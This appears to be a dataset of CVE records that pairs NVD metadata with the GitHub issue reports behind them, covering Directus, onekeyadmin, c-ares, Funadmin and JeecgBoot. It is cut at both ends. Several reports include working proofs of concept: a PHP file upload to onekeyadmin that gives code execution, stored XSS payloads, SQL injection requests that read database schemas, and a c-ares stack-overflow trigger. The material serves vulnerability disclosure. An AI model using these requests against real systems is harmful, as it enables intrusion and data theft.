1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA) According to the execution result, all the database information of the mysql server of the system can be obtained, see Figure 5 for details. <img width="1512" alt="ๆˆชๅฑ2023-01-29 22 14 53" src="https://user-images.githubusercontent.com/32299945/215332357-86bd69da-69d3-4e89-9d17-800c30a4ca53.png"> So far the vulnerability has surfaced successfully.
There is a sql injection vulnerability in the jeecg 3.4.4 building block report
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4511/comments
3
2023-01-29T14:16:41Z
2023-11-01T01:16:34Z
https://github.com/jeecgboot/JeecgBoot/issues/4511
1,561,308,445
4,511
4,799
CVE-2023-27474
2023-03-06T17:15:10.740
Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 5.8, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://github.com/directus/directus/issues/17119" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/directus/directus/pull/17120" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://github.com/directus/directus/issues/17119" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/directus/directus/pull/17120" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rangerstudio:directus:*:*:*:*:*:*:*:*", "matchCriteriaId": "BE5ECBFC-CE32-46AA-AD02-04D5C9C78DA9", "versionEndExcluding": "9.23.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/directus/directus/issues/17119
[ "Issue Tracking", "Mailing List", "Third Party Advisory" ]
github.com
[ "directus", "directus" ]
### Describe the Bug URL handling is not properly encoding query parameter components according to the spec, this leads to various bugs. Found it requesting reset password emails. The affecting code is: https://github.com/directus/directus/blob/abde5adacdfa8a377d941923059c97c72ef6e15a/api/src/utils/url.ts#L69-L73 We cannot be building URLs by hand without non RFC compliant character handling. ### To Reproduce 1. Request a password reset request with a `reset_url` containing encoded characters With the REST api: ```sh curl --request POST \ --url "$BASE_URL/auth/password/request" \ --header 'content-type: application/json' \ --data '{ "email": "sample@example.com", "reset_url": "https://example.com/sample-ath?sample_encoded_parameter=sample%2Bvalue%21" }' ``` Optionally in GraphQL: ```gql mutation auth_password_request { auth_password_request( email: "sample@example.com" reset_url: "https://example.com/sample-ath?sample_encoded_parameter=sample%2Bvalue%21" ) } ``` As you can see the URL contains a parameter `sample_encoded_parameter` with the value `sample+value!` (when encoded corresponds to `sample%2Bvalue%21`) 3. An email will be sent with the following reset link: ``` https://example.com/sample-ath?sample_encoded_parameter=sample+value!&token=JWT_TOKEN_REDACTED ``` Instead we should be receiving ``` https://example.com/sample-ath?sample_encoded_parameter=sample%2Bvalue%21&token=JWT_TOKEN_REDACTED ``` Directus is _unescaping_ the query parameters, and they should be kept as is (here demonstrated for values, but affects keys too). ### Errors Shown _No response_ ### What version of Directus are you using? 9.22.4 ### What version of Node.js are you using? 18.13.0 ### What database are you using? (not relevant) PostgreSQL 13 ### What browser are you using? (not relevant) Chrome ### How are you deploying Directus? locally and Docker _PaaS is not affected_
Password reset improperlly handles url-encoded query parameters in reset_url
https://api.github.com/repos/directus/directus/issues/17119/comments
1
2023-01-12T16:44:42Z
2024-02-01T22:03:28Z
https://github.com/directus/directus/issues/17119
1,531,043,078
17,119
4,800
CVE-2023-26949
2023-03-06T21:15:11.343
An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/keheying/onekeyadmin/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "keheying", "onekeyadmin" ]
Vulnerability affects product:onekeyadmin Vulnerability affects version 1.3.9 Vulnerability type:Remote code execution Vulnerability Details๏ผš Remote code execution caused by uploading arbitrary files in the background Vulnerability location Vulnerability occurs in app\admin\controller\File#upload Although there are restrictions on ext <img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211447414-69a5d85f-5041-4cf2-8313-704b2167ca3f.png"> but we found The app\admin\controller\Config#update method can update the limit <img width="974" alt="image" src="https://user-images.githubusercontent.com/122217858/211447538-8355f2c7-0c7c-47ba-aaf8-495e15e4e545.png"> <img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447550-6c26d381-7e9a-4b4a-9ada-9d217533f409.png"> Vulnerability recurrence Conditions Admin poc The first step is to update the configuration to allow uploading php files `POST /admin1/config/update HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 398 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/config/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae Connection: close {"title":"ๆถ“ๅฉ็ดถ้—„ๆ„ฌๅŸ—","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}` <img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious files `POST /admin1/file/upload HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 280 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP Accept: */* Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/file/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae Connection: close ------WebKitFormBoundaryARP8fRC2kb4GP3oP Content-Disposition: form-data; name="name" templatex ------WebKitFormBoundaryARP8fRC2kb4GP3oP Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: text/php <?php phpinfo();?> ------WebKitFormBoundaryARP8fRC2kb4GP3oP-- ` <img width="961" alt="image" src="https://user-images.githubusercontent.com/122217858/211447704-42a1446e-adf1-4332-8359-248bbc28d2ae.png"> <img width="984" alt="image" src="https://user-images.githubusercontent.com/122217858/211447729-9965e8e7-fe26-4612-96f9-d222eead2a79.png">
Remote code execution caused by uploading arbitrary files in the background
https://api.github.com/repos/keheying/onekeyadmin/issues/1/comments
1
2023-01-10T02:25:19Z
2023-03-20T02:13:00Z
https://github.com/keheying/onekeyadmin/issues/1
1,526,656,884
1
4,801
CVE-2022-4904
2023-03-06T23:15:11.390
A flaw was found in the c-ares package. The ares_set_sortlist is missing checks about the validity of the input string, which allows a possible arbitrary length stack overflow. This issue may cause a denial of service or a limited impact on confidentiality and integrity.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2168631" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/c-ares/c-ares/issues/496" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33LDNS6RPOPP36Z4MPWXALUQZXJCWJS2/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://security.gentoo.org/glsa/202401-02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2168631" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/c-ares/c-ares/issues/496" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33LDNS6RPOPP36Z4MPWXALUQZXJCWJS2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202401-02" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:c-ares_project:c-ares:*:*:*:*:*:*:*:*", "matchCriteriaId": "A324E7D7-4A6F-41B9-9615-AEBAC4EB1332", "versionEndExcluding": "1.19.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*", "matchCriteriaId": "749804DA-4B27-492A-9ABA-6BB562A6B3AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1284" ]
1284
https://github.com/c-ares/c-ares/issues/496
[ "Exploit", "Issue Tracking" ]
github.com
[ "c-ares", "c-ares" ]
In `ares_set_sortlist`, it calls `config_sortlist(..., sortstr)` to parse the input str and initialize a sortlist configuration. However, `ares_set_sortlist` has not any checks about the validity of the input str. It is very easy to create an arbitrary length stack overflow with the unchecked `memcpy(ipbuf, str, q-str);` and `memcpy(ipbufpfx, str, q-str);` statements in the config_sortlist call, which could potentially cause severe security impact in practical programs. For example, the litter case could produce a stack overflow: ``` #include "ares.h" #include<stdlib.h> typedef int8_t i8; typedef int32_t i32; int main() { struct ares_channeldata *v0 = NULL; // channel i32 v2 = ares_init(&v0); // $relative i8 v5[] = "111.111.111.111*shellcode*shellcode*shellcode*/"; // sortstr i32 v6 = ares_set_sortlist(v0, v5); // $target } ``` As `ares_set_sortlist` is a public interface of a widely-used library, i think it is necessary to add some checks to forbid further severe security bugs.
Potential stack overflow in ares_set_sortlist
https://api.github.com/repos/c-ares/c-ares/issues/496/comments
1
2022-12-13T12:45:08Z
2023-02-09T15:46:23Z
https://github.com/c-ares/c-ares/issues/496
1,494,168,938
496
4,802
CVE-2023-26954
2023-03-07T13:15:10.257
onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin_project:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "DA64EBFB-B0D9-4CBB-9CE4-3D2F648D5558", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/keheying/onekeyadmin/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:storage xss vulnerability๏ผˆCross-site scripting๏ผ‰ 4. Vulnerability Details๏ผš <img src=1 onerror=alert("xss");> url http://192.168.3.129:8091/admin1#userGroup/index <img width="1004" alt="image" src="https://user-images.githubusercontent.com/122217858/211449430-48880bb8-a73f-4ff0-b1e7-f3fef5c5876e.png"> poc POST /admin1/userGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 114 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/userGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"id":"","title":"test<img src=1 onerror=alert(\"xss\");>","integral":0,"default":0,"status":1,"theme":"template"} <img width="986" alt="image" src="https://user-images.githubusercontent.com/122217858/211449463-e02099cc-63c1-41c5-af52-ff6d9a29d891.png"> then you can view xss in url http://192.168.3.129:8091/admin1#userGroup/index <img width="1010" alt="image" src="https://user-images.githubusercontent.com/122217858/211449494-db258986-7f18-4e94-a537-1687f0680191.png">
Backstage member grouping - add storage xss vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/11/comments
1
2023-01-10T02:40:17Z
2023-03-20T02:14:48Z
https://github.com/keheying/onekeyadmin/issues/11
1,526,667,366
11
4,803
CVE-2023-26955
2023-03-07T13:15:10.323
onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/keheying/onekeyadmin/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin_project:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "DA64EBFB-B0D9-4CBB-9CE4-3D2F648D5558", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/keheying/onekeyadmin/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:storage xss vulnerability๏ผˆCross-site scripting๏ผ‰ 4. Vulnerability Details๏ผš <img src=1 onerror=alert("xss");> url http://192.168.3.129:8091/admin1#adminGroup/index <img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448666-b9ab1842-811e-439e-9772-736ebd705ae9.png"> `POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close {"id":"","title":"<img src=1 onerror=alert(\"xss\");>","status":1,"role":[],"theme":"template"}` <img width="959" alt="image" src="https://user-images.githubusercontent.com/122217858/211448696-b9b28efb-0a93-44ae-a955-0a3673c32147.png"> then you can view xss in url: http://192.168.3.129:8091/admin1#adminGroup/index <img width="964" alt="image" src="https://user-images.githubusercontent.com/122217858/211448720-02254b32-8282-4289-9cbb-589d47387ff3.png">
Background role management - there is a storage xss vulnerability in adding roles
https://api.github.com/repos/keheying/onekeyadmin/issues/6/comments
1
2023-01-10T02:33:30Z
2023-03-20T02:15:00Z
https://github.com/keheying/onekeyadmin/issues/6
1,526,663,021
6
4,804
CVE-2023-24781
2023-03-07T15:15:11.247
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\MemberLevel.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/8
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Vulnerability location app\backend\controller\member\MemberLevel.php# is called app\backend\controller\member\Member.php#index method <img width="1231" alt="image" src="https://user-images.githubusercontent.com/122217858/215309902-c1519802-7a05-49fb-bb84-57c3f7d18c67.png"> After getting the parameter selectFields here, continue to enter selectFields method app\common\traits\Curd.php#selectList <img width="1228" alt="image" src="https://user-images.githubusercontent.com/122217858/215309915-5ac2df1a-62b7-443d-b91f-be399cf400ab.png"> Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced โ€‹โ€‹into sql without filtering to cause sql injection Vulnerability reproduction: Background administrator rights sqlmap poc `GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=*&selectFields%5Bvalue%5D=id HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip ` <img width="1014" alt="image" src="https://user-images.githubusercontent.com/122217858/215309926-2b0c32cb-3e7f-490f-a8bb-f0789fcf06de.png">
member.memberLevel#selectFields[name] has sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/8/comments
1
2023-01-29T06:47:02Z
2023-05-05T06:40:41Z
https://github.com/funadmin/funadmin/issues/8
1,561,151,226
8
4,805
CVE-2023-26953
2023-03-07T15:15:11.300
onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/keheying/onekeyadmin/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/keheying/onekeyadmin/issues/8" } ]
